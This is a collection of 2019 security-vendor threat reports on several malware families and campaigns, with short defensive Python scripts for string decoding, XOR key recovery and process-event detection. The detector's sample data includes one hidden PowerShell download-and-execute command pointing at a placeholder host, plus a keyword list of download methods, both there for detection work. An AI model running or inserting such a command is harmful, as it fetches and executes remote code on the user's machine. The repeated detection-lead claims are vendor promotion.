Buer Loader Designed for Malware-as-a-Service Attackers

What Is It?

Researchers at Proofpoint have been following the appearance of a new downloader, named Buer by its authors, since the latter part of August 2019. This downloader is sold on various dark web forums and contains a feature set that is similar to the highly prevalent Smoke Loader. Smoke Loader is known to have downloaded various trojans, including those specifically designed for stealing financial and banking credentials.

In previous Threat Reports we have discussed a subset of malware called downloaders (often shortened to just “loaders”). When used by attackers, a loader is the initial infection vector, designed to evade detection by endpoint security products and then download and execute one or more malicious payloads. Loaders give attackers a great deal of flexibility in the malicious payloads they can deploy and are generally used by attackers buying malware-as-a-service (MaaS) options. If a loader evades detection, it can download a variety of malware families and variants on behalf of numerous unrelated attackers. Conversely, if a loader is detected and prevented from executing, a wide range of attacks can be blocked.

In August, researchers first noticed Buer being installed on systems compromised by the tried and true method of a Microsoft Word document containing a malicious macro attached to a spam email. This was followed by several other malicious campaigns in September and October. While investigating, researchers found Buer was being sold for $400. The advertisement for its sale contained a lot of information regarding the feature set of the control panel, used by the purchaser to monitor infections and interact with infected systems. Obviously, this is an important aspect for potential customers, usually less technically-skilled attackers, who choose MaaS.

The primary function of the Buer loader is to download and execute other malware. To achieve this, Buer needs to evade detection, which it attempts with common methods such as checking for virtual machines and debuggers, and confirming that it is not running on a system in one of several former Soviet countries. It also encrypts strings and obfuscates Windows system calls. Researchers also found support for downloading additional modules, though they have not yet observed this behavior.

How Does It Propagate?

Buer loader does not contain the necessary code to self-propagate. It has been observed being distributed by spam campaigns containing Word document attachments with malicious macros.

When/How Did BluVector Detect It?

Five samples listed in the research report are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown these samples would have been detected an average of 38 months prior to their release.



PureLocker Multiplatform Ransomware Avoids Legacy AntiVirus Detection

What Is It?

PureLocker, a new multiplatform ransomware recently named by researchers from Intezer and IBM X-Force, is being used in targeted attacks against production servers of enterprise-level organizations. While the research was performed on Windows variants, they also observed a Linux variant being used by the attackers, providing them with more options for compromising the infrastructure of their targets.

The name PureLocker derives from the fact it is written in the programming language PureBasic. The use of the somewhat obscure PureBasic language is advantageous to the attackers in two important ways. Firstly, PureBasic is relatively easily ported between Windows, Linux and macOS, increasing the potential attack surface with limited effort. Secondly, Intezer found signature-based antivirus had difficulty detecting PureBasic executables. In fact, over a three-week period from mid to late October 2019, samples submitted to VirusTotal varied between one and zero detections out of the 66+ products the samples were tested against. They also found samples showed no malicious behavior when tested against several sandboxes.

To avoid detection, PureLocker utilizes multiple techniques. Text strings within a sample are often used for signature-based detection, so obfuscation of strings is quite common. In the case of PureLocker, strings are stored as hex strings and decoded as required. Upon execution, PureLocker checks to ensure that it is not being debugged or otherwise analyzed. While this is a common technique, PureLocker does something different: it will exit but not delete itself if it detects analysis attempts. By not deleting itself, it potentially appears less malicious behaviorally than a sample which exits and deletes itself. It also checks which process is executing it, its own filename extension, that the current year is 2019 and that it has administrator-level access.
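Because PureLocker keeps its strings hex-encoded, a plain strings dump of a sample shows only runs of hex digits. The following triage helper, an added example rather than code from the Intezer/IBM report, scans a buffer for long even-length hex runs, decodes them and keeps only the ones that yield printable text, which is how an analyst can surface the hidden indicators; the sample buffer and the strings in it are constructed for the demonstration.

```python
"""Recover hex-encoded strings from a sample buffer (added example)."""
import re
import string

# Runs of at least 8 hex digits (4 decoded bytes), taken two digits at a time so
# only even-length runs match; odd-length runs are skipped rather than mis-split.
HEX_RUN = re.compile(rb"(?<![0-9A-Fa-f])((?:[0-9A-Fa-f]{2}){4,})(?![0-9A-Fa-f])")

# Printable ASCII minus the vertical-tab/form-feed control characters.
PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")


def is_printable(data: bytes, min_ratio: float = 0.95) -> bool:
    """True when nearly every byte is printable ASCII (filters binary that happens to be hex)."""
    if not data:
        return False
    good = sum(1 for b in data if b in PRINTABLE)
    return good / len(data) >= min_ratio


def recover_hex_strings(buf: bytes, min_len: int = 4) -> list:
    """Return (offset, decoded_text) for every hex run that decodes to printable text."""
    found = []
    for m in HEX_RUN.finditer(buf):
        raw = bytes.fromhex(m.group(1).decode("ascii"))
        if len(raw) >= min_len and is_printable(raw):
            found.append((m.start(1), raw.decode("ascii")))
    return found


def encode_hex(s: str) -> bytes:
    """Encode text the way the sample stores it: ASCII hex digits."""
    return s.encode().hex().encode("ascii")


# Constructed sample buffer standing in for a data section of a sample.
# The ".CR1" extension comes from the report; the other strings are made up.
SAMPLE = (
    b"\x00" * 16
    + encode_hex(".CR1")
    + b"\x00\x00"
    + encode_hex("ransom_note.txt")
    + b"\xff\xff"
    + b"deadbeef0102"  # hex run that decodes to non-printable bytes: dropped
    + b"\x00"
    + encode_hex("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run")
)

if __name__ == "__main__":
    for offset, text in recover_hex_strings(SAMPLE):
        print(f"0x{offset:04x}: {text}")
```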

If all checks pass and PureLocker executes its ransomware payload, it avoids executable files and encrypts a large range of data files, appending .CR1 to the end of the filename. Once encrypted, the original file is deleted securely. The displayed ransom note contains a unique Proton email address for communication with the attackers and does not contain a ransom amount; clearly the amount is negotiated with the attackers via email.

How Does It Propagate?

PureLocker does not contain the necessary code to self-propagate. The infection vector is not known; however, for most ransomware it is social engineering, either as malicious attachments or downloads performed by malicious documents.

When/How Did BluVector Detect It?

Despite the observed difficulties that legacy anti-virus and sandbox products have in detecting PureLocker, two samples are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected both. Regression testing has shown the samples would have been detected a full 52 and 53 months, respectively, prior to their release.


Fileless Malware: If You’re Not Worried, You Should Be

Gartner, Inc. estimates that more than $124 billion will be spent on information security products and services in 2019. Conversely, it is estimated that cybercrime will cost the world in excess of $6 trillion annually by 2021, up from $3 trillion in 2015. While the message that “crime does not pay” was drilled into our heads in TV and movies… it seems that this crime does.

The first computer “virus” can be traced back to 1971. Named “Creeper system,” it would infect the computer with the message “I'm the creeper, catch me if you can!” and would disable that workstation.

Over the years, the bad guys continue to hone their tools, and the computer virus has paved the way for computer worms, ransomware, spyware, adware, trojan horses, keyloggers, rootkits and other malicious software. While each has its own unique traits, the intent is the same: infecting a computer to do something “evil” on behalf of a threat actor.

As the cat-and-mouse game between security professionals and threat actors plays out on a daily basis, a new threat is emerging that is keeping the good guys up at night. The threat of fileless malware is increasing and brings a unique set of challenges to an industry that still thinks mainly about how to combat file-based attacks.

Fileless malware describes a set of attacks that use the underlying operating system, usually Microsoft Windows, against itself. A typical end user barely scratches the surface of the capabilities built into the operating system. Under the hood of Windows are over 100 legitimate Windows system tools including PowerShell, Windows Management Instrumentation (WMI), .NET and Microsoft Office Macros that can be exploited in a fileless malware attack.

These tools do serve a purpose in the typical enterprise. PowerShell is used by system administrators to automate tasks; WMI is used to manage Windows workstations on a network; .NET is used for custom application development; and Microsoft Office Macros can be used to work magic in Microsoft Word, Excel or PowerPoint.

So, how can you protect against these types of attacks? Turning everything off isn’t possible. A typical enterprise would quickly grind to a halt (and it would be virtually technically impossible to do).

The first thing to keep in mind is that the most common attack vector for fileless malware attacks is delivery as an attachment to an email. Microsoft Office documents or PDF files are often used to deliver a payload with malicious intent. The payload will attempt to use one or more legitimate Windows tools to execute a script or macro and exploit that workstation. As they utilize legitimate Windows functions, they are hard to detect. So threat actors can hide in the shadows of what looks to be normal activity.

Existing, signature-based security can help with known threats, yet it is challenged to protect against fileless malware attacks. The payload seems to be legitimate and will not raise any red flags. The key to protecting against fileless malware is to look beyond the payload’s contents and instead understand what that payload is capable of.

While great efforts have been made to educate end users to recognize when an email doesn’t look right and enabling them with a mechanism to report it to the security team, it is only part of the solution. It only takes one user to open an attachment that they should not have to cause a problem.

This is where machine learning (ML) and artificial intelligence (AI) can play a large part in the defense of a network. ML and AI can analyze files and network traffic at line speeds and determine if that content has the potential to do something malicious. A Microsoft Excel spreadsheet with a macro that calculates commissions for a sales team is likely legitimate, but a spreadsheet that executes a Microsoft PowerShell command to download a piece of code is probably not.

A well-trained workforce is a key part of network defense, but it doesn’t scale. An effective defense needs to analyze traffic as it comes across the network and stop it before it makes it into users’ inboxes.

The good news is that the Speculative Code Execution in BluVector Cortex was created to help with the detection of fileless malware within an organization’s network environment. If you’re already a customer, you already have this capability.


Adwind RAT Targets U.S. Petroleum Industry

What Is It?

A new campaign utilizing the Adwind RAT (Remote Access Trojan) and specifically targeting organizations within the U.S. petroleum industry has been discovered by researchers at Netskope. The Adwind RAT is also known as AlienSpy, Frutas, jRAT, JSocket and Sockrat and is written in Java, allowing it to execute on Windows, Linux and Mac systems.

Adwind is available for sale by its authors on the dark web via a malware-as-a-service (MaaS) offering, where attackers pay a fee in order to use the malware in their malicious campaigns. Adwind has been available for a number of years and reports state there were approximately 1,800 unique customers at the end of 2015.

Adwind contains functionality expected of a RAT, including the ability to log keystrokes, steal credentials stored on the system or entered on web pages, capture screenshots, audio and video, manipulate files, steal cryptocurrency keys and VPN certificates, and download and execute other malware. Netskope found that the attackers behind this campaign were using Adwind as a reconnaissance and exfiltration tool to acquire credentials, documents and other files, such as SSH keys, to allow the attackers to move laterally through the network.

The Adwind malware itself isn’t particularly sophisticated at a code level and Netskope believes the variants in this campaign weren’t using the latest versions. However, what makes this campaign noteworthy is the use of multi-level obfuscation and encryption as an attempt to evade detection by legacy security products, including anti-virus. The initial malicious Java JAR file infects systems at targeted organizations as an attachment or a link in a malicious spam email. This JAR file copies itself to the user’s directory and runs the copy, which then decrypts and executes the next stage, which in turn then creates the final JAR payload.

Netskope found the author’s time and effort was well spent creating the multi-level obfuscation and encryption. When the samples were initially scanned by the VirusTotal service, the initial sample was only detected by five products, whereas the final, unobfuscated sample was detected by 49. Clearly their techniques were successful at evading detection by legacy anti-virus products.

After the fact, these products can now create signatures to detect this specific initial sample, however, BluVector Cortex was capable of detecting both these samples months prior to them even being created.

How Does It Propagate?

The Adwind malware does not contain the necessary code to self-propagate. Malicious spam emails containing a link or attachment are used to compromise systems at targeted organizations.

When/How Did BluVector Detect It?

Both the initial and final malicious JAR samples were detected by BluVector’s patented Machine Learning Engine (MLE). Regression testing has shown these samples would have been detected for an average of 30 months prior to their release.



PcShare Malware Brings a Fake Narrator

What Is It?

Researchers from Cylance’s research and intelligence team have detailed an ongoing campaign called PcShare by a suspected Chinese APT (Advanced Persistent Threat) group targeting heavy industrial organizations in South East Asia, including the Philippines and Taiwan. The attack, consisting of two components, starts with a customized variant of a Chinese open source remote access trojan (RAT), PcShare, which is then followed by a trojanized screen reader which replaces the Narrator utility, part of the Microsoft Accessibility Features supplied with Microsoft Windows 10.

The source code for several versions of PcShare is available on GitHub, however the version used by these attackers is heavily modified and employs techniques intended to make detection, especially by legacy anti-virus products, more difficult. Firstly, the code for any functionality not required by the attackers has been removed, which not only makes the code smaller and more efficient, but is likely intended to make signature-based detection less likely. Next, the attack uses a technique known as “DLL side loading” to use a legitimate application to load malicious code into memory and execute it. In this case, a component of the NVIDIA graphics driver is used to achieve this.

The malicious payload is encrypted with the most basic method, an XOR operation using a single byte as the encryption key. However, as an anti-analysis mechanism against manual or automated sandbox analysis, the single-byte encryption key is calculated from the name of its parent process. Once decrypted, the payload is loaded in RAM without ever being saved to disk, again attempting to avoid detection by endpoint security software. These techniques are all relevant only in the context of the malware executing on an endpoint and have no impact on BluVector’s network detection capabilities.
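A single-byte XOR key that depends on the parent process name defeats a sandbox that runs the loader under a different parent, but an analyst holding the encrypted blob does not need the derivation at all: with a one-byte key there are only 256 candidates, and a decrypted PE image announces itself with its headers. The script below is an added example, not Cylance's code; the report does not give the key derivation, so `key_from_process_name` is a constructed stand-in, and the "payload" is a minimal constructed DOS/PE header rather than a real sample.

```python
"""Recover a single-byte XOR key from an encrypted PE payload (added example)."""
import struct
from typing import Optional

DOS_MAGIC = b"MZ"
PE_MAGIC = b"PE\0\0"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with the same one-byte key (encryption and decryption are identical)."""
    return bytes(b ^ key for b in data)


def looks_like_pe(data: bytes) -> bool:
    """Accept a buffer only if the DOS header and the e_lfanew -> 'PE\\0\\0' link both check out."""
    if len(data) < 0x40 or data[:2] != DOS_MAGIC:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == PE_MAGIC


def recover_xor_key(blob: bytes) -> Optional[int]:
    """Brute-force all 256 keys; return the one that yields a PE image, or None."""
    for key in range(256):
        if looks_like_pe(xor_bytes(blob, key)):
            return key
    return None


def key_from_process_name(name: str) -> int:
    """Constructed stand-in for the loader's key derivation (the real one is not published)."""
    return sum(name.lower().encode()) & 0xFF


def build_fake_pe() -> bytes:
    """Constructed minimal PE-like image: DOS header, e_lfanew = 0x80, PE signature at 0x80."""
    hdr = bytearray(0x90)
    hdr[:2] = DOS_MAGIC
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    stub = b"This program cannot be run in DOS mode"
    hdr[0x40:0x40 + len(stub)] = stub
    hdr[0x80:0x84] = PE_MAGIC
    return bytes(hdr)


FAKE_PE = build_fake_pe()
KEY = key_from_process_name("rundll32.exe")  # hypothetical parent process name
ENCRYPTED = xor_bytes(FAKE_PE, KEY)

if __name__ == "__main__":
    found = recover_xor_key(ENCRYPTED)
    print(f"recovered key: {found:#04x}, expected: {KEY:#04x}")
    print("decrypted header:", xor_bytes(ENCRYPTED, found)[:2])
```

Because XOR with a fixed byte is a bijection on each position, only one key can turn the first two ciphertext bytes into "MZ", so the search yields a single candidate rather than a list to sift.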

Some of the functionality removed from publicly available PcShare versions relates to audio/video streaming and keylogging. However, the attackers have added the ability to encrypt C2 (command and control) traffic. They have also added code to obtain proxy authentication credentials stored on the infected system; as most corporate networks use proxies, this allows the malware to communicate in such an environment. As a RAT, functionality exists to manipulate files, running processes and registry keys, and to download and execute other code.

One such piece of code is the so-called fake Narrator malware. The purpose of fake Narrator is to allow the attackers to remotely obtain access to a command prompt, with system level privileges, without authentication. Prior to installing fake Narrator on an infected system, the attackers will rename the legitimate Narrator executable. When fake Narrator has been enabled at the logon screen via Ease Of Access, it runs the legitimate Narrator and creates a hidden, overlapped window. It then monitors keystrokes for a hardcoded password which, if received, allows the attackers to run any application with system privileges on the logon screen. The infected system is now completely compromised and remotely accessible by the attackers.

How Does It Propagate?

The malware discussed here does not self-propagate. The infection vector is not known. However, the most likely vector is social engineering, either as a malicious attachment or downloads performed by malicious documents or links.

When/How Did BluVector Detect It?

Three samples of PcShare are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected them all. Despite the samples being first seen in the wild up to 15 months ago, regression testing has shown the samples would have been detected an average of 47 months prior to their original release.


Emotet Returns After a Summer Break

What Is It?

First discovered in 2014, the Emotet trojan has previously been the subject of several Threat Reports. Initially a banking trojan, it has since evolved to focus on the sending of spam emails and distribution of other malware. This change in functionality might be tied to this being a more profitable option for its authors.

In early June 2019, it was observed that its C2 (command and control) servers had stopped communicating with infected systems. Researchers posited this would be a temporary shutdown and were proven correct, as C2 traffic restarted on August 22nd. After the restart, it appears that the authors performed some housekeeping on their infrastructure, such as removing fake bots attempting to communicate to the C2 servers and preparing the next campaign.

In mid-September the new campaign began, aimed at users in the U.S., the UK, Poland, Italy and Germany. This was a widespread campaign, with spam emails received by home users in addition to corporate and government organizations. Researchers from Cofense Labs found emails from this campaign were sent to users at more than 30,000 domain names and came from 3,362 unique senders at 1,875 domains. The senders’ email credentials had previously been stolen. The spam emails used mainly financially oriented lures, such as overdue bills or payment receipts, and were written in the language (English, Polish, Italian or German) matching the domain they were sent to. True to form for Emotet, the attachments to these emails were Microsoft Word documents with malicious macros. Once the Emotet trojan was installed, the Trickbot trojan was downloaded, which frequently results in a tertiary infection of Ryuk ransomware.

The campaign described above has been followed up with another beginning this week. Utilizing another oft-used technique from the attacker’s playbook, the lure of this campaign is that the attachment is a Microsoft Word copy of the highly-publicized and controversial new book by Edward Snowden.

Researchers from Malwarebytes Labs found examples of these spam emails in English, French, Spanish, German and Italian. When the user opens the Microsoft Word document, it uses a similar social engineering technique to the previous campaign to convince users to provide the necessary permissions to allow the malicious macro to execute. In this case, it states Word has not been activated and in order to continue using it, they must enable editing and enable content.

Emotet continues to be an extremely dangerous and prolific threat, in most cases a triple threat of Emotet, Trickbot and Ryuk. The potential end result is the theft of data and credentials followed by encryption of the user’s data.

How Does It Propagate?

Emotet uses malicious Microsoft Word documents attached to spam emails as its initial infection vector. However, Emotet also contains a list of frequently used passwords which it uses to attempt to access and infect other systems on the network.

When/How Did BluVector Detect It?

Samples are publicly available from both Emotet campaigns described above and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown samples of both the malicious Microsoft Word documents and the Emotet trojan would have been detected for up to 69 months prior to their release.


Every Employee Is a Cybersecurity Employee

Once, during new hire training, a representative from each department was brought in to introduce their department and its function and to answer any questions from new employees.

In one of these trainings, a salesman talked about his team and then asked the new employees, “What department do you work in?” Hands went up with answers of “finance,” “human resources,” “customer support,” “engineering” among others. Once everyone was done, he took a dramatic pause and loudly stated, “No! You all work in sales!” His logic was that every employee of the company worked for sales, since each of them helped to represent and “sell” the company to others.

Today, while that still rings true, there is an additional job that everyone in the organization has – being part of the cyber defense for the organization. That shared responsibility is key in making sure that an organization, of any size, is protected against threats.

In 2004, to help promote awareness of the threats, the National Cyber Security Division within the Department of Homeland Security and the nonprofit National Cyber Security Alliance launched National Cyber Security Awareness Month (NCSAM).

October is NCSAM and the theme for 2019 is “Own IT. Secure IT. Protect IT.”, which puts the focus of the shared responsibility on the individual. “Own IT” focuses on the end-user owning their own presence online making them responsible for privacy and application usage. “Secure IT” is about reminding end users to ensure that all transactions are secure and that they are aware of their surroundings online. Finally, “Protect IT” reminds users and enterprises to keep up with the latest security software and patches for browsers, devices and operating systems, as well as to make sure that data that is collected (data at rest) is protected.

Security and IT organizations should focus their efforts on setting up awareness and education programs for their end users as well as their system administrators and security teams. End users should be educated on how to spot, avoid and report phishing emails to avoid exposing the organization to malware. System administrators should be reminded to keep their applications and servers up to date with patches and to stay abreast of the latest Common Vulnerabilities and Exposures (CVE) that are relevant for their systems. Users with remote access permissions or using their own devices (BYOT) need to be reminded how to use these safely to access organization resources. Finally, all employees need to understand the exposure created by the use of social media, especially the risk posed by spearphishing.

Cybersecurity awareness should not be limited to the month of October; the awareness activities and programs shouldn’t stop when the month ends. Organizations are under constant threat from every angle. Keeping an organization secure is a full-time job and, just like the sales guy who stated that everyone is in sales… every employee is part of the cyber defense for an organization.


Thrip APT Group Continues Attacks

What Is It?

Symantec has published the results of research into continuing attacks from an APT (Advanced Persistent Threat) group known as Thrip. It first reported on the activities of this group in June 2018, after Thrip had been targeting satellite communications, telecommunications, geospatial imaging and government/defense organizations, mainly in South East Asia. Attacks by Thrip utilized custom malware in addition to commonly used utilities such as PsExec, Powershell and the open source FTP client, WinSCP.

Since mid-2018, Thrip has continued to target organizations in South East Asia involved in maritime communications, media, education, military and additional satellite communications providers. Target organizations are located in Hong Kong, Indonesia, Macau, Malaysia, the Philippines and Vietnam.

The custom malware utilized in these attacks consists of two backdoors, designated Hannotog and Sagerunex. Additionally, Thrip uses new variants of an information stealer referred to as Catchamas. The Hannotog backdoor provides Thrip with a foothold into a network, Sagerunex offers remote access to systems within the network and Catchamas is selectively installed on systems identified as potentially containing information of value to the attackers.

Thrip also makes use of commonly used utilities, a technique known as “living off the land,” to move laterally through a network and perform reconnaissance. From an attacker’s point of view, the aim is to make use of a target system’s native tools that have numerous legitimate uses, such as Powershell, which is heavily used by Microsoft Windows administrators to perform system management tasks. In this way, less malware needs to be deployed, potentially reducing the likelihood of detection of the compromise, especially by legacy anti-virus solutions.

Symantec found that Sagerunex appears to be an updated variant of the Evora backdoor malware used by the Billbug APT group. That group has been active for more than 10 years and, like Thrip, has a history of executing attacks against organizations in South East Asia. Attribution can be an inexact science, but Symantec believes that Thrip and Billbug may be the same group or separate teams within the same group. Billbug has previously used spearphishing attacks with malicious PDF or Microsoft Office documents as its initial infection vector.

How Does It Propagate?

Though not specifically mentioned, it is likely that the initial infection occurs via malicious PDF or Microsoft Office documents, either as attachments or links within spearphishing emails.

When/How Did BluVector Detect It?

There are 25 samples publicly available and BluVector’s patented Machine Learning Engine (MLE) detected them all. Regression testing has shown the samples would have been detected for an average of 21 months prior to their release.


Microsoft .NET Utilized to Create New Malware Threats on the Fly

An Internet Storm Center diary entry from last week described recent examples the handler had seen of malware that dynamically compiles its next payload on the infected system. While this is not a new approach to evading detection, previous instances required that development tools such as compilers were already installed on the system, significantly reducing the potential attack surface: the user of the infected machine would likely have been a software developer. On one hand, this limits the number of targets. On the other hand, if a software developer were to compile software that is then shared or sent to others, this would increase the likelihood of additional infections.

In this case, the samples utilize components of the Microsoft .NET runtime environment, which is installed on the vast majority of systems running Microsoft Windows. That means that any system running Windows might be vulnerable to this type of attack.

Both samples create Metasploit Meterpreter reverse shells, giving attackers backdoor access to infected systems. The first sample is a JScript script which decodes included base64 data and passes it to the JScript compiler, resulting in an executable payload. The second sample is a Microsoft Excel spreadsheet containing a malicious macro which also decodes included base64 data. This time the decoded data is passed to the msbuild.exe utility, again resulting in an executable payload.

In both of these cases the attackers are attempting to use dynamic compilation to evade detection of their second stage payloads. However, there is nothing sophisticated or novel about their initial infection vectors, which negates their second stage efforts.
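Whatever the compiled payload looks like, the act of a script host or an Office application launching a compiler is visible in process-creation telemetry, and the same feed exposes the Office-macro-to-PowerShell download pattern from the fileless malware piece above. The detector below is an added example, not code from the ISC diary or from BluVector; it walks a constructed feed modelled on Sysmon event ID 1 fields (timestamp, parent image, image, command line) and flags the parent/child pairs those two passages describe. The process names, paths and the download keyword list are assumptions chosen for the demonstration.

```python
"""Flag process-creation events typical of dynamic compilation and Office-spawned shells (added example)."""
import csv
import io
import ntpath  # Windows paths; os.path would not split on backslashes on Linux
from typing import List, Optional, Tuple

# Script hosts and Office applications that should rarely launch build tools or shells.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# .NET command-line compilers and MSBuild, the two compile paths named in the diary.
BUILD_TOOLS = {"jsc.exe", "csc.exe", "vbc.exe", "msbuild.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Substrings that mark a shell command line as downloading further code.
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "webclient", "invoke-webrequest", "bitstransfer")


def classify(parent_image: str, image: str, cmdline: str) -> Optional[str]:
    """Return a short reason string for a suspicious parent/child pair, or None if benign."""
    parent = ntpath.basename(parent_image).lower()
    child = ntpath.basename(image).lower()
    if child in BUILD_TOOLS and parent in SCRIPT_HOSTS | OFFICE_APPS:
        return f"dynamic-compile: {parent} -> {child}"
    if child in SHELLS and parent in OFFICE_APPS:
        lowered = cmdline.lower()
        tag = "office-shell-download" if any(h in lowered for h in DOWNLOAD_HINTS) else "office-shell"
        return f"{tag}: {parent} -> {child}"
    return None


def scan_events(feed: str) -> List[Tuple[str, str]]:
    """Run classify() over a CSV feed and return (UtcTime, reason) for each flagged event."""
    alerts = []
    for row in csv.DictReader(io.StringIO(feed)):
        reason = classify(row["ParentImage"], row["Image"], row["CommandLine"])
        if reason:
            alerts.append((row["UtcTime"], reason))
    return alerts


# Constructed sample feed: two compile chains, one macro-to-PowerShell download,
# and two benign rows (a build server running MSBuild, Excel spawning the print spooler helper).
SAMPLE_FEED = r"""UtcTime,ParentImage,Image,CommandLine
2019-10-01 09:00:01,C:\Windows\explorer.exe,C:\Windows\System32\wscript.exe,wscript.exe invoice.js
2019-10-01 09:00:02,C:\Windows\System32\wscript.exe,C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe,jsc.exe /nologo /out:a.exe tmp.js
2019-10-01 09:05:10,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,MSBuild.exe stage.xml
2019-10-01 09:07:33,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(http://example.invalid/s)
2019-10-01 09:30:00,C:\Windows\System32\services.exe,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,MSBuild.exe build.proj
2019-10-01 09:31:00,C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,C:\Windows\splwow64.exe,splwow64.exe 12288
"""

if __name__ == "__main__":
    for when, reason in scan_events(SAMPLE_FEED):
        print(when, reason)
```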

When/How Did BluVector Detect It?

BluVector’s patented Machine Learning Engine (MLE) detected the samples. Regression testing has shown the samples would have been detected up to 71 months prior to their release.


APT28 Using Sofacy Backdoor to Evade Machine Learning

The Cylance Threat Research Team released a deep dive report into a piece of malware utilized by the APT28 cyber espionage group, also known as Fancy Bear. The sample was originally uploaded to VirusTotal in May 2019 by US Cyber Command.

The malware, often referred to by legacy AV by the generic name Sofacy, is a backdoor that receives instructions from a C2 (command and control) site and is capable of uploading and downloading files, creating processes and executing a remote shell. It can also contact its C2 site on a predefined schedule, otherwise remaining apparently dormant. C2 communication occurs over port 443 (HTTPS) or port 80 (HTTP). As with many backdoors, it includes the ability to generate C2 host domain names for resiliency purposes.

As this APT malware is used as the initial infection on compromised systems, researchers believe the APT28 group has spent considerable time and effort developing it in an attempt to evade detection by products utilizing machine learning. Examples of this include using standard libraries and compilers, commonly used by benign software. The researchers believe 99% of the code appears to be benign, which may be an attempt to bias the result of detection engines using machine learning towards a benign determination.

When/How Did BluVector Detect It?

Despite the apparent machine learning detection countermeasures, this sample is detected by BluVector’s patented Machine Learning Engine (MLE). Regression testing has shown the sample would have been detected 13 months prior to its original release.